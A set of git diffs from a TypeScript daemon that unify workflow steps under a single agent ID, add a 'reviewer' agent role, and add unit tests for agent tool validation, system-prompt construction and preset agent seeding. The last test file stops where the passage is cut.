+++ b/packages/daemon/src/storage/repositories/space-workflow-repository.ts
@@ -9,10 +9,8 @@
  *                          order_index, config (JSON), created_at, updated_at
  *
  * The `config` column on space_workflows stores: { tags, rules, ...extra }
- * The `config` column on space_workflow_steps stores: { agentRefType, agentRef, entryGate?,
- *   exitGate?, instructions? }
- * The `agent_id` column stores the custom SpaceAgent's UUID when agentRefType='custom',
- *   otherwise null.
+ * The `config` column on space_workflow_steps stores: { entryGate?, exitGate?, instructions? }
+ * The `agent_id` column stores the SpaceAgent UUID for the step.
  */
 
 import type { Database as BunDatabase } from 'bun:sqlite';
@@ -63,8 +61,6 @@ interface WorkflowConfigJson {
 
 // JSON stored inside space_workflow_steps.config
 interface StepConfigJson {
-	agentRefType: 'builtin' | 'custom';
-	agentRef: string;
 	entryGate?: WorkflowGate;
 	exitGate?: WorkflowGate;
 	instructions?: string;
@@ -84,28 +80,16 @@ function parseJson<T>(raw: string | null | undefined, fallback: T): T {
 }
 
 function rowToStep(row: StepRow): WorkflowStep {
-	const cfg = parseJson<StepConfigJson>(row.config, {
-		agentRefType: 'builtin',
-		agentRef: 'general',
-	});
-
-	const base = {
+	const cfg = parseJson<StepConfigJson>(row.config, {});
+	return {
 		id: row.id,
 		name: row.name,
+		agentId: row.agent_id ?? '',
 		order: row.order_index,
 		entryGate: cfg.entryGate,
 		exitGate: cfg.exitGate,
 		instructions: cfg.instructions,
 	};
-
-	if (cfg.agentRefType === 'custom') {
-		return { ...base, agentRefType: 'custom', agentRef: cfg.agentRef } as WorkflowStep;
-	}
-	return {
-		...base,
-		agentRefType: 'builtin',
-		agentRef: cfg.agentRef as 'planner' | 'coder' | 'general',
-	} as WorkflowStep;
 }
 
 function rowToWorkflow(row: WorkflowRow, steps: WorkflowStep[]): SpaceWorkflow {
@@ -309,14 +293,12 @@ export class SpaceWorkflowRepository {
 	): void {
 		const stepId = generateUUID();
 		const stepCfg: StepConfigJson = {
-			agentRefType: input.agentRefType,
-			agentRef: input.agentRef,
 			entryGate: input.entryGate,
 			exitGate: input.exitGate,
 			instructions: input.instructions,
 		};
 
-		const agentId = input.agentRefType === 'custom' ? input.agentRef : null;
+		const agentId = input.agentId;
 
 		this.db
 			.prepare(

--- a/packages/daemon/src/storage/repositories/space-workflow-repository.ts
+++ b/packages/daemon/src/storage/repositories/space-workflow-repository.ts
@@ -5,7 +5,7 @@
  *
  * Storage layout:
  *   space_workflows  — id, space_id, name, description, config (JSON), created_at, updated_at
- *   space_workflow_steps — id, workflow_id, name, description, agent_id (custom UUID | null),
+ *   space_workflow_steps — id, workflow_id, name, description, agent_id (SpaceAgent UUID),
  *                          order_index, config (JSON), created_at, updated_at
  *
  * The `config` column on space_workflows stores: { tags, rules, ...extra }
@@ -80,11 +80,14 @@ function parseJson<T>(raw: string | null | undefined, fallback: T): T {
 }
 
 function rowToStep(row: StepRow): WorkflowStep {
+	if (!row.agent_id) {
+		throw new Error(`WorkflowStep ${row.id}: agent_id is null in DB`);
+	}
 	const cfg = parseJson<StepConfigJson>(row.config, {});
 	return {
 		id: row.id,
 		name: row.name,
-		agentId: row.agent_id ?? '',
+		agentId: row.agent_id,
 		order: row.order_index,
 		entryGate: cfg.entryGate,
 		exitGate: cfg.exitGate,

--- a/packages/daemon/src/storage/schema/migrations.ts
+++ b/packages/daemon/src/storage/schema/migrations.ts
@@ -1675,7 +1675,7 @@ function runMigration29(db: BunDatabase): void {
 
 /**
  * Migration 30: Add role and provider columns to space_agents.
- * - role: builtin agent role preset ('planner'|'coder'|'general'), matching BuiltinAgentRole
+ * - role: builtin agent role preset ('planner'|'coder'|'general'|'reviewer'), matching BuiltinAgentRole
  * - provider: optional provider identifier (e.g. 'anthropic', 'glm')
  *
  * SQLite CHECK constraint limitation:
@@ -1694,7 +1694,7 @@ function runMigration30(db: BunDatabase): void {
 		db.prepare(`SELECT role FROM space_agents LIMIT 1`).all();
 	} catch {
 		db.exec(
-			`ALTER TABLE space_agents ADD COLUMN role TEXT NOT NULL DEFAULT 'coder' CHECK(role IN ('planner', 'coder', 'general'))`
+			`ALTER TABLE space_agents ADD COLUMN role TEXT NOT NULL DEFAULT 'coder' CHECK(role IN ('planner', 'coder', 'general', 'reviewer'))`
 		);
 	}
 

--- a/packages/daemon/tests/unit/helpers/space-agent-schema.ts
+++ b/packages/daemon/tests/unit/helpers/space-agent-schema.ts
@@ -38,7 +38,7 @@ export function createSpaceAgentSchema(db: Database): void {
 			tools TEXT NOT NULL DEFAULT '[]',
 			system_prompt TEXT NOT NULL DEFAULT '',
 			role TEXT NOT NULL DEFAULT 'coder'
-				CHECK(role IN ('planner', 'coder', 'general')),
+				CHECK(role IN ('planner', 'coder', 'general', 'reviewer')),
 			config TEXT,
 			created_at INTEGER NOT NULL,
 			updated_at INTEGER NOT NULL,

--- a/packages/daemon/tests/unit/lib/space-agent-manager.test.ts
+++ b/packages/daemon/tests/unit/lib/space-agent-manager.test.ts
@@ -316,4 +316,93 @@ describe('SpaceAgentManager', () => {
 			expect(result[0].name).toBe('A');
 		});
 	});
+
+	// -------------------------------------------------------------------------
+	// tools validation (KNOWN_TOOLS)
+	// -------------------------------------------------------------------------
+
+	describe('create — tools validation', () => {
+		it('accepts valid tool names from KNOWN_TOOLS', async () => {
+			const result = await manager.create({
+				spaceId: 'space-1',
+				name: 'ToolAgent',
+				role: 'coder',
+				tools: ['Read', 'Write', 'Bash'],
+			});
+			expect(result.ok).toBe(true);
+			if (result.ok) expect(result.value.tools).toEqual(['Read', 'Write', 'Bash']);
+		});
+
+		it('rejects unknown tool names', async () => {
+			const result = await manager.create({
+				spaceId: 'space-1',
+				name: 'BadTool',
+				role: 'coder',
+				tools: ['Read', 'FakeTool'],
+			});
+			expect(result.ok).toBe(false);
+			if (!result.ok) {
+				expect(result.error).toContain('"FakeTool"');
+				expect(result.error).toContain('Unknown tool');
+			}
+		});
+
+		it('rejects multiple unknown tool names in a single error', async () => {
+			const result = await manager.create({
+				spaceId: 'space-1',
+				name: 'MultiBad',
+				role: 'coder',
+				tools: ['NotATool', 'AlsoNotATool'],
+			});
+			expect(result.ok).toBe(false);
+			if (!result.ok) {
+				expect(result.error).toContain('"NotATool"');
+				expect(result.error).toContain('"AlsoNotATool"');
+			}
+		});
+
+		it('accepts undefined tools (no override)', async () => {
+			const result = await manager.create({
+				spaceId: 'space-1',
+				name: 'NoTools',
+				role: 'coder',
+				tools: undefined,
+			});
+			expect(result.ok).toBe(true);
+		});
+	});
+
+	describe('update — tools validation', () => {
+		it('accepts valid tool names on update', async () => {
+			const created = await manager.create({ spaceId: 'space-1', name: 'Agent', role: 'coder' });
+			if (!created.ok) throw new Error('create failed');
+
+			const result = await manager.update(created.value.id, { tools: ['Bash', 'Glob'] });
+			expect(result.ok).toBe(true);
+			if (result.ok) expect(result.value.tools).toEqual(['Bash', 'Glob']);
+		});
+
+		it('rejects invalid tool names on update', async () => {
+			const created = await manager.create({ spaceId: 'space-1', name: 'Agent2', role: 'coder' });
+			if (!created.ok) throw new Error('create failed');
+
+			const result = await manager.update(created.value.id, { tools: ['InvalidTool'] });
+			expect(result.ok).toBe(false);
+			if (!result.ok) expect(result.error).toContain('"InvalidTool"');
+		});
+
+		it('accepts null tools (clearing the override)', async () => {
+			const created = await manager.create({
+				spaceId: 'space-1',
+				name: 'Agent3',
+				role: 'coder',
+				tools: ['Read'],
+			});
+			if (!created.ok) throw new Error('create failed');
+
+			const result = await manager.update(created.value.id, { tools: null });
+			expect(result.ok).toBe(true);
+			if (result.ok) expect(result.value.tools).toBeUndefined();
+		});
+	});
 });

--- a/packages/daemon/tests/unit/space/custom-agent.test.ts
+++ b/packages/daemon/tests/unit/space/custom-agent.test.ts
@@ -443,12 +443,12 @@ describe('resolveAgentInit', () => {
 		};
 	}
 
-	it('uses createCustomAgentInit when task has customAgentId', () => {
-		const customAgent = makeAgent({ id: 'custom-agent-1', name: 'MyAgent' });
-		const manager = makeMockAgentManager(customAgent);
+	it('resolves agent by ID and calls createCustomAgentInit', () => {
+		const agent = makeAgent({ id: 'agent-1', name: 'MyAgent' });
+		const manager = makeMockAgentManager(agent);
 
 		const config = makeResolveConfig({
-			task: makeTask({ customAgentId: 'custom-agent-1' }),
+			task: makeTask({ customAgentId: 'agent-1' }),
 			agentManager: manager,
 		});
 
@@ -459,25 +459,39 @@ describe('resolveAgentInit', () => {
 		expect(init.systemPrompt?.append).toContain('MyAgent');
 	});
 
-	it('throws when customAgentId is set but agent not found', () => {
-		const manager = makeMockAgentManager(null); // agent not found
+	it('always calls createCustomAgentInit — no builtin fork', () => {
+		// A preset/seeded agent is just a regular SpaceAgent record.
+		// resolveAgentInit resolves it by ID identically to any other agent.
+		const presetAgent = makeAgent({ id: 'preset-coder', name: 'Coder', role: 'coder' });
+		const manager = makeMockAgentManager(presetAgent);
+
+		const config = makeResolveConfig({
+			task: makeTask({ customAgentId: 'preset-coder' }),
+			agentManager: manager,
+		});
+
+		const init = resolveAgentInit(config);
+		expect(init.sessionId).toBe('session-resolve');
+		expect(init.systemPrompt?.append).toContain('Coder Agent');
+	});
+
+	it('throws when task has no agentId', () => {
+		const config = makeResolveConfig({
+			task: makeTask({ customAgentId: undefined }),
+		});
+
+		expect(() => resolveAgentInit(config)).toThrow('has no agentId');
+	});
+
+	it('throws when agent ID not found in manager', () => {
+		const manager = makeMockAgentManager(null);
 
 		const config = makeResolveConfig({
 			task: makeTask({ customAgentId: 'missing-agent' }),
 			agentManager: manager,
 		});
 
-		expect(() => resolveAgentInit(config)).toThrow('Custom agent not found: missing-agent');
-	});
-
-	it('throws for built-in agent path (not yet implemented, M4)', () => {
-		const config = makeResolveConfig({
-			task: makeTask({ customAgentId: undefined }), // no custom agent
-		});
-
-		expect(() => resolveAgentInit(config)).toThrow(
-			'Built-in Space agent factories are not yet implemented'
-		);
+		expect(() => resolveAgentInit(config)).toThrow('Agent not found: missing-agent');
 	});
 
 	it('passes workflowRun context to createCustomAgentInit', () => {

--- a/packages/daemon/tests/unit/space/custom-agent.test.ts
+++ b/packages/daemon/tests/unit/space/custom-agent.test.ts
@@ -1,0 +1,544 @@
+/**
+ * Custom Agent Factory Unit Tests
+ *
+ * Tests for buildCustomAgentSystemPrompt, buildCustomAgentTaskMessage,
+ * createCustomAgentInit, and resolveAgentInit.
+ */
+
+import { describe, it, expect, mock } from 'bun:test';
+import {
+	buildCustomAgentSystemPrompt,
+	buildCustomAgentTaskMessage,
+	createCustomAgentInit,
+	resolveAgentInit,
+	type CustomAgentConfig,
+	type ResolveAgentInitConfig,
+} from '../../../src/lib/space/agents/custom-agent';
+import type { SpaceAgent, SpaceTask, SpaceWorkflowRun, Space } from '@neokai/shared';
+import type { SpaceAgentManager } from '../../../src/lib/space/managers/space-agent-manager';
+
+// ============================================================================
+// Test fixtures
+// ============================================================================
+
+function makeAgent(overrides?: Partial<SpaceAgent>): SpaceAgent {
+	return {
+		id: 'agent-1',
+		spaceId: 'space-1',
+		name: 'TestCoder',
+		role: 'coder',
+		createdAt: Date.now(),
+		updatedAt: Date.now(),
+		...overrides,
+	};
+}
+
+function makeSpace(overrides?: Partial<Space>): Space {
+	return {
+		id: 'space-1',
+		workspacePath: '/workspace/project',
+		name: 'Test Space',
+		description: 'A test space',
+		backgroundContext: '',
+		instructions: '',
+		sessionIds: [],
+		status: 'active',
+		createdAt: Date.now(),
+		updatedAt: Date.now(),
+		...overrides,
+	};
+}
+
+function makeTask(overrides?: Partial<SpaceTask>): SpaceTask {
+	return {
+		id: 'task-1',
+		spaceId: 'space-1',
+		title: 'Implement feature X',
+		description: 'Add feature X to the codebase',
+		status: 'pending',
+		priority: 'normal',
+		dependsOn: [],
+		createdAt: Date.now(),
+		updatedAt: Date.now(),
+		...overrides,
+	};
+}
+
+function makeWorkflowRun(overrides?: Partial<SpaceWorkflowRun>): SpaceWorkflowRun {
+	return {
+		id: 'run-1',
+		spaceId: 'space-1',
+		workflowId: 'wf-1',
+		title: 'Deploy v1.0',
+		currentStepIndex: 0,
+		status: 'in_progress',
+		createdAt: Date.now(),
+		updatedAt: Date.now(),
+		...overrides,
+	};
+}
+
+function makeConfig(overrides?: Partial<CustomAgentConfig>): CustomAgentConfig {
+	return {
+		customAgent: makeAgent(),
+		task: makeTask(),
+		workflowRun: null,
+		space: makeSpace(),
+		sessionId: 'session-abc',
+		workspacePath: '/workspace/project',
+		...overrides,
+	};
+}
+
+// ============================================================================
+// buildCustomAgentSystemPrompt
+// ============================================================================
+
+describe('buildCustomAgentSystemPrompt', () => {
+	it('includes agent name in role identification', () => {
+		const agent = makeAgent({ name: 'MyCoderBot', role: 'coder' });
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).toContain('MyCoderBot');
+		expect(prompt).toContain('Coder Agent');
+	});
+
+	it('includes general role label for general role', () => {
+		const agent = makeAgent({ role: 'general' });
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).toContain('General Agent');
+	});
+
+	it('includes planner role label for planner role', () => {
+		const agent = makeAgent({ role: 'planner' });
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).toContain('Planner Agent');
+	});
+
+	it('includes reviewer role label for reviewer role', () => {
+		const agent = makeAgent({ role: 'reviewer' });
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).toContain('Reviewer Agent');
+	});
+
+	it('includes custom systemPrompt content', () => {
+		const agent = makeAgent({ systemPrompt: 'Focus only on backend changes.' });
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).toContain('Focus only on backend changes.');
+		expect(prompt).toContain('Agent Instructions');
+	});
+
+	it('omits Agent Instructions section when systemPrompt is unset', () => {
+		const agent = makeAgent({ systemPrompt: undefined });
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).not.toContain('Agent Instructions');
+	});
+
+	it('includes mandatory git workflow instructions', () => {
+		const agent = makeAgent();
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).toContain('Git Workflow (MANDATORY)');
+		expect(prompt).toContain('git fetch origin && git rebase origin/$DEFAULT_BRANCH');
+		expect(prompt).toContain('git push -u origin HEAD');
+		expect(prompt).toContain('gh pr create');
+	});
+
+	it('includes bypass markers section', () => {
+		const agent = makeAgent();
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).toContain('Bypassing Git/PR Gates for Research-Only Tasks');
+		expect(prompt).toContain('RESEARCH_ONLY:');
+		expect(prompt).toContain('VERIFICATION_COMPLETE:');
+		expect(prompt).toContain('INVESTIGATION_RESULT:');
+		expect(prompt).toContain('ANALYSIS_COMPLETE:');
+	});
+
+	it('includes review feedback section', () => {
+		const agent = makeAgent();
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).toContain('Addressing Review Feedback');
+		expect(prompt).toContain('pullrequestreview');
+	});
+
+	it('reviewer role includes review-specific instructions', () => {
+		const agent = makeAgent({ role: 'reviewer' });
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).toContain('Review Responsibilities');
+		expect(prompt).toContain('specialized Worker');
+		expect(prompt).toContain('NOT a Leader replacement');
+	});
+
+	it('non-reviewer roles do not include Review Responsibilities section', () => {
+		for (const role of ['coder', 'general', 'planner'] as const) {
+			const agent = makeAgent({ role });
+			const prompt = buildCustomAgentSystemPrompt(agent);
+			expect(prompt).not.toContain('Review Responsibilities');
+		}
+	});
+
+	it('warns about not committing to main branch', () => {
+		const agent = makeAgent();
+		const prompt = buildCustomAgentSystemPrompt(agent);
+		expect(prompt).toContain('Do NOT commit directly to the main/dev/master branch');
+	});
+});
+
+// ============================================================================
+// buildCustomAgentTaskMessage
+// ============================================================================
+
+describe('buildCustomAgentTaskMessage', () => {
+	it('includes task title and description', () => {
+		const config = makeConfig({
+			task: makeTask({ title: 'Add login flow', description: 'Implement JWT login' }),
+		});
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('Add login flow');
+		expect(msg).toContain('Implement JWT login');
+	});
+
+	it('includes task priority when set', () => {
+		const config = makeConfig({ task: makeTask({ priority: 'high' }) });
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('high');
+	});
+
+	it('includes task type when set', () => {
+		const config = makeConfig({ task: makeTask({ taskType: 'coding' }) });
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('coding');
+	});
+
+	it('includes workflow run context when provided', () => {
+		const run = makeWorkflowRun({ title: 'Deploy v2.1', description: 'Production deploy' });
+		const config = makeConfig({ workflowRun: run });
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('Workflow Context');
+		expect(msg).toContain('Deploy v2.1');
+		expect(msg).toContain('Production deploy');
+	});
+
+	it('omits workflow context when workflowRun is null', () => {
+		const config = makeConfig({ workflowRun: null });
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).not.toContain('Workflow Context');
+	});
+
+	it('includes space backgroundContext', () => {
+		const space = makeSpace({ backgroundContext: 'This is a Node.js REST API project.' });
+		const config = makeConfig({ space });
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('Project Context');
+		expect(msg).toContain('This is a Node.js REST API project.');
+	});
+
+	it('includes space instructions', () => {
+		const space = makeSpace({ instructions: 'Always run bun test before pushing.' });
+		const config = makeConfig({ space });
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('Instructions');
+		expect(msg).toContain('Always run bun test before pushing.');
+	});
+
+	it('includes existing PR URL when task has a PR', () => {
+		const task = makeTask({ prUrl: 'https://github.com/org/repo/pull/42' });
+		const config = makeConfig({ task });
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('Existing Pull Request');
+		expect(msg).toContain('https://github.com/org/repo/pull/42');
+	});
+
+	it('includes previous task summaries when provided', () => {
+		const config = makeConfig({
+			previousTaskSummaries: ['Task A: Added auth module', 'Task B: Added user model'],
+		});
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('Previous Work on This Goal');
+		expect(msg).toContain('Task A: Added auth module');
+		expect(msg).toContain('Task B: Added user model');
+	});
+
+	it('includes review instructions for review task type', () => {
+		const config = makeConfig({
+			task: makeTask({ taskType: 'review' }),
+			customAgent: makeAgent({ role: 'coder' }), // non-reviewer role but review task
+		});
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('Review Instructions');
+		expect(msg).toContain('Approved');
+		expect(msg).toContain('Changes Requested');
+	});
+
+	it('includes review instructions for reviewer role agent', () => {
+		const config = makeConfig({
+			customAgent: makeAgent({ role: 'reviewer' }),
+			task: makeTask({ taskType: 'coding' }), // non-review task but reviewer agent
+		});
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('Review Instructions');
+	});
+
+	it('ends with begin working prompt', () => {
+		const config = makeConfig();
+		const msg = buildCustomAgentTaskMessage(config);
+		expect(msg).toContain('Begin working on this task.');
+	});
+});
+
+// ============================================================================
+// createCustomAgentInit
+// ============================================================================
+
+describe('createCustomAgentInit', () => {
+	it('produces a valid session init', () => {
+		const config = makeConfig();
+		const init = createCustomAgentInit(config);
+
+		expect(init.sessionId).toBe('session-abc');
+		expect(init.workspacePath).toBe('/workspace/project');
+		expect(init.type).toBe('worker');
+		expect(init.contextAutoQueue).toBe(false);
+	});
+
+	it('uses claude_code preset with appended system prompt', () => {
+		const config = makeConfig();
+		const init = createCustomAgentInit(config);
+
+		expect(init.systemPrompt).toBeDefined();
+		expect(init.systemPrompt?.type).toBe('preset');
+		expect(init.systemPrompt?.preset).toBe('claude_code');
+		expect(init.systemPrompt?.append).toBeDefined();
+		expect(typeof init.systemPrompt?.append).toBe('string');
+	});
+
+	it('appended prompt contains git workflow instructions', () => {
+		const config = makeConfig();
+		const init = createCustomAgentInit(config);
+		expect(init.systemPrompt?.append).toContain('Git Workflow (MANDATORY)');
+	});
+
+	it('uses model from SpaceAgent.model when set', () => {
+		const config = makeConfig({
+			customAgent: makeAgent({ model: 'claude-opus-4-6' }),
+		});
+		const init = createCustomAgentInit(config);
+		expect(init.model).toBe('claude-opus-4-6');
+	});
+
+	it('falls back to space.defaultModel when agent model is unset', () => {
+		const config = makeConfig({
+			customAgent: makeAgent({ model: undefined }),
+			space: makeSpace({ defaultModel: 'claude-haiku-4-5' }),
+		});
+		const init = createCustomAgentInit(config);
+		expect(init.model).toBe('claude-haiku-4-5');
+	});
+
+	it('falls back to hardcoded default when both agent and space models are unset', () => {
+		const config = makeConfig({
+			customAgent: makeAgent({ model: undefined }),
+			space: makeSpace({ defaultModel: undefined }),
+		});
+		const init = createCustomAgentInit(config);
+		expect(init.model).toBe('claude-sonnet-4-5-20250929');
+	});
+
+	it('uses agent/agents pattern when SpaceAgent.tools is configured', () => {
+		const customTools = ['Read', 'Bash', 'Grep'];
+		const config = makeConfig({
+			customAgent: makeAgent({ tools: customTools, name: 'MyBot' }),
+		});
+		const init = createCustomAgentInit(config);
+
+		// Should use the agent/agents pattern for tool restriction
+		expect(init.agent).toBe('mybot');
+		expect(init.agents).toBeDefined();
+		expect(init.agents?.['mybot']).toBeDefined();
+		expect(init.agents?.['mybot'].tools).toEqual(customTools);
+		// No append in this path — prompt is in the agent def
+		expect(init.systemPrompt?.append).toBeUndefined();
+	});
+
+	it('uses simple preset path when SpaceAgent.tools is unset', () => {
+		const config = makeConfig({
+			customAgent: makeAgent({ tools: undefined }),
+		});
+		const init = createCustomAgentInit(config);
+
+		// Simple path: no agents map, prompt appended to preset
+		expect(init.agent).toBeUndefined();
+		expect(init.agents).toBeUndefined();
+		expect(init.systemPrompt?.append).toBeDefined();
+	});
+
+	it('uses simple preset path when SpaceAgent.tools is empty array', () => {
+		const config = makeConfig({
+			customAgent: makeAgent({ tools: [] }),
+		});
+		const init = createCustomAgentInit(config);
+
+		// Empty array treated as unset — falls back to simple path
+		expect(init.agent).toBeUndefined();
+		expect(init.agents).toBeUndefined();
+	});
+
+	it('sets spaceId in session context', () => {
+		const config = makeConfig({ space: makeSpace({ id: 'space-xyz' }) });
+		const init = createCustomAgentInit(config);
+		expect(init.context?.spaceId).toBe('space-xyz');
+	});
+
+	it('disables all worker features', () => {
+		const config = makeConfig();
+		const init = createCustomAgentInit(config);
+		expect(init.features?.rewind).toBe(false);
+		expect(init.features?.worktree).toBe(false);
+		expect(init.features?.coordinator).toBe(false);
+		expect(init.features?.archive).toBe(false);
+		expect(init.features?.sessionInfo).toBe(false);
+	});
+
+	it('builds correct init for reviewer role', () => {
+		const config = makeConfig({
+			customAgent: makeAgent({ role: 'reviewer', name: 'CodeReviewer' }),
+		});
+		const init = createCustomAgentInit(config);
+
+		expect(init.type).toBe('worker');
+		expect(init.systemPrompt?.append).toContain('Reviewer Agent');
+		expect(init.systemPrompt?.append).toContain('Review Responsibilities');
+	});
+
+	it('builds correct init for planner role (treated as worker)', () => {
+		const config = makeConfig({
+			customAgent: makeAgent({ role: 'planner', name: 'ArchitectBot' }),
+		});
+		const init = createCustomAgentInit(config);
+
+		expect(init.type).toBe('worker');
+		expect(init.systemPrompt?.append).toContain('Planner Agent');
+		expect(init.systemPrompt?.append).not.toContain('Review Responsibilities');
+	});
+});
+
+// ============================================================================
+// resolveAgentInit
+// ============================================================================
+
+describe('resolveAgentInit', () => {
+	function makeMockAgentManager(agent: SpaceAgent | null): SpaceAgentManager {
+		return {
+			getById: mock(() => agent),
+		} as unknown as SpaceAgentManager;
+	}
+
+	function makeResolveConfig(overrides?: Partial<ResolveAgentInitConfig>): ResolveAgentInitConfig {
+		return {
+			task: makeTask(),
+			space: makeSpace(),
+			agentManager: makeMockAgentManager(makeAgent()),
+			sessionId: 'session-resolve',
+			workspacePath: '/workspace/project',
+			workflowRun: null,
+			...overrides,
+		};
+	}
+
+	it('uses createCustomAgentInit when task has customAgentId', () => {
+		const customAgent = makeAgent({ id: 'custom-agent-1', name: 'MyAgent' });
+		const manager = makeMockAgentManager(customAgent);
+
+		const config = makeResolveConfig({
+			task: makeTask({ customAgentId: 'custom-agent-1' }),
+			agentManager: manager,
+		});
+
+		const init = resolveAgentInit(config);
+
+		expect(init.sessionId).toBe('session-resolve');
+		expect(init.type).toBe('worker');
+		expect(init.systemPrompt?.append).toContain('MyAgent');
+	});
+
+	it('throws when customAgentId is set but agent not found', () => {
+		const manager = makeMockAgentManager(null); // agent not found
+
+		const config = makeResolveConfig({
+			task: makeTask({ customAgentId: 'missing-agent' }),
+			agentManager: manager,
+		});
+
+		expect(() => resolveAgentInit(config)).toThrow('Custom agent not found: missing-agent');
+	});
+
+	it('throws for built-in agent path (not yet implemented, M4)', () => {
+		const config = makeResolveConfig({
+			task: makeTask({ customAgentId: undefined }), // no custom agent
+		});
+
+		expect(() => resolveAgentInit(config)).toThrow(
+			'Built-in Space agent factories are not yet implemented'
+		);
+	});
+
+	it('passes workflowRun context to createCustomAgentInit', () => {
+		const customAgent = makeAgent({ id: 'agent-1', name: 'CoderBot' });
+		const manager = makeMockAgentManager(customAgent);
+		const run = makeWorkflowRun({ title: 'Workflow Alpha' });
+
+		const config = makeResolveConfig({
+			task: makeTask({ customAgentId: 'agent-1' }),
+			agentManager: manager,
+			workflowRun: run,
+		});
+
+		// Should not throw and should produce an init with the workflowRun available
+		const init = resolveAgentInit(config);
+		expect(init.sessionId).toBe('session-resolve');
+	});
+
+	it('passes previousTaskSummaries to createCustomAgentInit', () => {
+		const customAgent = makeAgent({ id: 'agent-1' });
+		const manager = makeMockAgentManager(customAgent);
+
+		const config = makeResolveConfig({
+			task: makeTask({ customAgentId: 'agent-1' }),
+			agentManager: manager,
+			previousTaskSummaries: ['Summary of task A'],
+		});
+
+		const init = resolveAgentInit(config);
+		expect(init.sessionId).toBe('session-resolve');
+	});
+});
+
+// ============================================================================
+// SpaceAgent.tools field via repository (integration-style)
+// ============================================================================
+
+describe('SpaceAgent tools field', () => {
+	it('agent with tools set has tools on the object', () => {
+		const agent = makeAgent({ tools: ['Read', 'Bash'] });
+		expect(agent.tools).toEqual(['Read', 'Bash']);
+	});
+
+	it('agent without tools has tools as undefined', () => {
+		const agent = makeAgent({ tools: undefined });
+		expect(agent.tools).toBeUndefined();
+	});
+
+	it('createCustomAgentInit wires tools into agents map when set', () => {
+		const config = makeConfig({
+			customAgent: makeAgent({ tools: ['Read', 'Bash', 'Grep'], name: 'ToolBot' }),
+		});
+		const init = createCustomAgentInit(config);
+		expect(init.agents?.['toolbot']?.tools).toEqual(['Read', 'Bash', 'Grep']);
+	});
+
+	it('createCustomAgentInit uses simple path when agent tools is empty array', () => {
+		const config = makeConfig({
+			customAgent: makeAgent({ tools: [] }),
+		});
+		const init = createCustomAgentInit(config);
+		expect(init.agents).toBeUndefined();
+	});
+});

--- a/packages/daemon/tests/unit/space/custom-agent.test.ts
+++ b/packages/daemon/tests/unit/space/custom-agent.test.ts
@@ -542,3 +542,42 @@ describe('SpaceAgent tools field', () => {
 		expect(init.agents).toBeUndefined();
 	});
 });
+
+// ============================================================================
+// sanitizeAgentKey edge cases (via observable init.agent key)
+// ============================================================================
+
+describe('sanitizeAgentKey (via init.agent)', () => {
+	function initWithName(name: string): ReturnType<typeof createCustomAgentInit> {
+		return createCustomAgentInit(makeConfig({ customAgent: makeAgent({ name, tools: ['Read'] }) }));
+	}
+
+	it('lowercases the name', () => {
+		expect(initWithName('MyBot').agent).toBe('mybot');
+	});
+
+	it('replaces spaces with hyphens', () => {
+		expect(initWithName('My Agent').agent).toBe('my-agent');
+	});
+
+	it('collapses consecutive non-alphanumeric chars to a single hyphen', () => {
+		expect(initWithName('foo  --  bar').agent).toBe('foo-bar');
+	});
+
+	it('strips leading and trailing hyphens', () => {
+		expect(initWithName('---agent---').agent).toBe('agent');
+	});
+
+	it('truncates to 40 chars', () => {
+		const longName = 'a'.repeat(50);
+		expect(initWithName(longName).agent).toBe('a'.repeat(40));
+	});
+
+	it('falls back to custom-agent when name is all special characters', () => {
+		expect(initWithName('!!!###').agent).toBe('custom-agent');
+	});
+
+	it('handles Unicode/emoji gracefully (strips to fallback)', () => {
+		expect(initWithName('🤖🔥').agent).toBe('custom-agent');
+	});
+});

--- a/packages/daemon/tests/unit/space/seed-agents.test.ts
+++ b/packages/daemon/tests/unit/space/seed-agents.test.ts
@@ -1,0 +1,144 @@
+/**
+ * seedPresetAgents Unit Tests
+ *
+ * Verifies that the four preset SpaceAgent records are created with correct
+ * defaults (role, tools, description) and that seeding is idempotent (errors
+ * on name collision are captured but do not abort remaining seeds).
+ */
+
+import { describe, it, expect, beforeEach, afterEach } from 'bun:test';
+import { Database } from 'bun:sqlite';
+import { SpaceAgentRepository } from '../../../src/storage/repositories/space-agent-repository';
+import { SpaceAgentManager } from '../../../src/lib/space/managers/space-agent-manager';
+import { seedPresetAgents } from '../../../src/lib/space/agents/seed-agents';
+import { setModelsCache } from '../../../src/lib/model-service';
+import { createSpaceAgentSchema, insertSpace } from '../helpers/space-agent-schema';
+
+describe('seedPresetAgents', () => {
+	let db: Database;
+	let manager: SpaceAgentManager;
+
+	beforeEach(() => {
+		db = new Database(':memory:');
+		createSpaceAgentSchema(db);
+		insertSpace(db);
+		const repo = new SpaceAgentRepository(db as any);
+		manager = new SpaceAgentManager(repo);
+		setModelsCache(new Map()); // skip model validation
+	});
+
+	afterEach(() => {
+		db.close();
+		setModelsCache(new Map());
+	});
+
+	it('creates exactly four preset agents', async () => {
+		const result = await seedPresetAgents('space-1', manager);
+
+		expect(result.seeded).toHaveLength(4);
+		expect(result.errors).toHaveLength(0);
+	});
+
+	it('creates agents with correct roles', async () => {
+		const { seeded } = await seedPresetAgents('space-1', manager);
+
+		const roles = seeded.map((a) => a.role).sort();
+		expect(roles).toEqual(['coder', 'general', 'planner', 'reviewer']);
+	});
+
